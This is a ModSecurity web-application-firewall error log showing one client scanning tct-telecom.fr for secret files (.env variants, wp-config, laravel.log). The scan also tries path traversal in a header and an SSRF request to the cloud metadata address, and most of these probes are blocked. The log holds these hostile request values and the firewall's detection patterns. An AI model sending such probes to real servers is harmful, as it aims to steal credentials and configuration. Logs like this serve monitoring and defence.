[Tue May 12 04:50:44.852200 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhDue9Sp-pIv_Bb63yQAAAVI"]
[Tue May 12 04:50:44.852260 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhDue9Sp-pIv_Bb63yQAAAVI"]
[Tue May 12 04:50:44.852540 2026] [core:error] [pid 1730207:tid 1730220] [client 93.123.109.165:7818] AH10244: invalid URI path (/static../../../.env)
[Tue May 12 04:50:44.853050 2026] [security2:error] [pid 1825179:tid 1825200] [client 93.123.109.165:7864] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agKVhNr1yOh9TvizeziSmgAAAEI"]
[Tue May 12 04:50:44.853182 2026] [security2:error] [pid 1825179:tid 1825200] [client 93.123.109.165:7864] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agKVhNr1yOh9TvizeziSmgAAAEI"]
[Tue May 12 04:50:44.854233 2026] [security2:error] [pid 1825179:tid 1825207] [client 93.123.109.165:7830] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tct-telecom.fr"] [uri "/_next/image"] [unique_id "agKVhNr1yOh9TvizeziSmwAAAEk"]
[Tue May 12 04:50:44.854802 2026] [security2:error] [pid 1825287:tid 1825312] [client 93.123.109.165:7876] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "tct-telecom.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKVhAgpmE1yW0glLdghgQAAAMc"]
[Tue May 12 04:50:44.854850 2026] [security2:error] [pid 1825179:tid 1825207] [client 93.123.109.165:7830] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_next/image"] [unique_id "agKVhNr1yOh9TvizeziSmwAAAEk"]
[Tue May 12 04:50:44.854908 2026] [security2:error] [pid 1820198:tid 1820222] [client 93.123.109.165:7784] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.example"] [unique_id "agKVhM1tk6y7yBJLpJos3AAAAJY"]
[Tue May 12 04:50:44.855016 2026] [security2:error] [pid 1825287:tid 1825312] [client 93.123.109.165:7876] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKVhAgpmE1yW0glLdghgQAAAMc"]
[Tue May 12 04:50:44.855034 2026] [security2:error] [pid 1820198:tid 1820222] [client 93.123.109.165:7784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.example"] [unique_id "agKVhM1tk6y7yBJLpJos3AAAAJY"]
[Tue May 12 04:50:44.855379 2026] [core:error] [pid 1820198:tid 1820202] [client 93.123.109.165:7920] AH10244: invalid URI path (/../.env)
[Tue May 12 04:50:44.856577 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:7884] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/wp-config.php.txt"] [unique_id "agKVhHo6NvB9WXx5V-6howAAAQg"]
[Tue May 12 04:50:44.856737 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:7884] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/wp-config.php.txt"] [unique_id "agKVhHo6NvB9WXx5V-6howAAAQg"]
[Tue May 12 04:50:44.861001 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.165:7958] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVhDue9Sp-pIv_Bb63ywAAAUY"]
[Tue May 12 04:50:44.861072 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.165:7958] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVhDue9Sp-pIv_Bb63ywAAAUY"]
[Tue May 12 04:50:44.861182 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.165:7958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVhDue9Sp-pIv_Bb63ywAAAUY"]
[Tue May 12 04:50:44.866877 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhDue9Sp-pIv_Bb63yQAAAVI"]
[Tue May 12 04:50:44.867376 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhDue9Sp-pIv_Bb63yQAAAVI"]
[Tue May 12 04:50:44.868350 2026] [security2:error] [pid 1825287:tid 1825323] [client 93.123.109.165:7802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVhAgpmE1yW0glLdghhAAAANI"]
[Tue May 12 04:50:44.868479 2026] [security2:error] [pid 1825287:tid 1825323] [client 93.123.109.165:7802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVhAgpmE1yW0glLdghhAAAANI"]
[Tue May 12 04:50:44.907449 2026] [security2:error] [pid 1825287:tid 1825330] [client 93.123.109.165:7768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhAgpmE1yW0glLdghfwAAANg"]
[Tue May 12 04:50:44.916572 2026] [security2:error] [pid 1820198:tid 1820213] [client 93.123.109.165:7628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhM1tk6y7yBJLpJoszQAAAI0"]
[Tue May 12 04:50:44.953344 2026] [security2:error] [pid 1730207:tid 1730212] [client 93.123.109.165:7724] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhDue9Sp-pIv_Bb63xwAAAUM"]
[Tue May 12 04:50:45.054242 2026] [security2:error] [pid 1730175:tid 1730190] [client 93.123.109.165:7646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhHo6NvB9WXx5V-6hngAAAQ0"]
[Tue May 12 04:50:45.071793 2026] [security2:error] [pid 1730175:tid 1730201] [client 93.123.109.165:7676] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhHo6NvB9WXx5V-6hoAAAARg"]
[Tue May 12 04:50:45.163879 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.165:7610] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhHo6NvB9WXx5V-6hnwAAAQo"]
[Tue May 12 04:50:45.246363 2026] [security2:error] [pid 1730207:tid 1730233] [client 93.123.109.165:7702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhDue9Sp-pIv_Bb63xgAAAVg"]
[Tue May 12 04:50:45.399775 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:7932] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhNr1yOh9TvizeziSmQAAAEs"]
[Tue May 12 04:50:45.400852 2026] [security2:error] [pid 1825179:tid 1825200] [client 93.123.109.165:7864] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhNr1yOh9TvizeziSmgAAAEI"]
[Tue May 12 04:50:45.418107 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhDue9Sp-pIv_Bb63yQAAAVI"]
[Tue May 12 04:50:45.474627 2026] [security2:error] [pid 1825179:tid 1825216] [client 93.123.109.165:7700] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhNr1yOh9TvizeziSlgAAAFI"]
[Tue May 12 04:50:45.510818 2026] [security2:error] [pid 1825287:tid 1825312] [client 93.123.109.165:7876] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhAgpmE1yW0glLdghgQAAAMc"]
[Tue May 12 04:50:45.523582 2026] [security2:error] [pid 1825287:tid 1825316] [client 93.123.109.165:7734] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhAgpmE1yW0glLdghgAAAAMs"]
[Tue May 12 04:50:45.524835 2026] [security2:error] [pid 1825179:tid 1825207] [client 93.123.109.165:7830] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhNr1yOh9TvizeziSmwAAAEk"]
[Tue May 12 04:50:45.545659 2026] [security2:error] [pid 1730175:tid 1730186] [client 93.123.109.165:7946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhHo6NvB9WXx5V-6hoQAAAQk"]
[Tue May 12 04:50:45.914776 2026] [security2:error] [pid 1820198:tid 1820222] [client 93.123.109.165:7784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhM1tk6y7yBJLpJos3AAAAJY"]
[Tue May 12 04:50:45.919137 2026] [security2:error] [pid 1808852:tid 1808879] [client 93.123.109.165:7744] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhBfeipD4uoG21FolLgAAABg"]
[Tue May 12 04:50:46.393108 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos3wAAAIg"]
[Tue May 12 04:50:46.393182 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos3wAAAIg"]
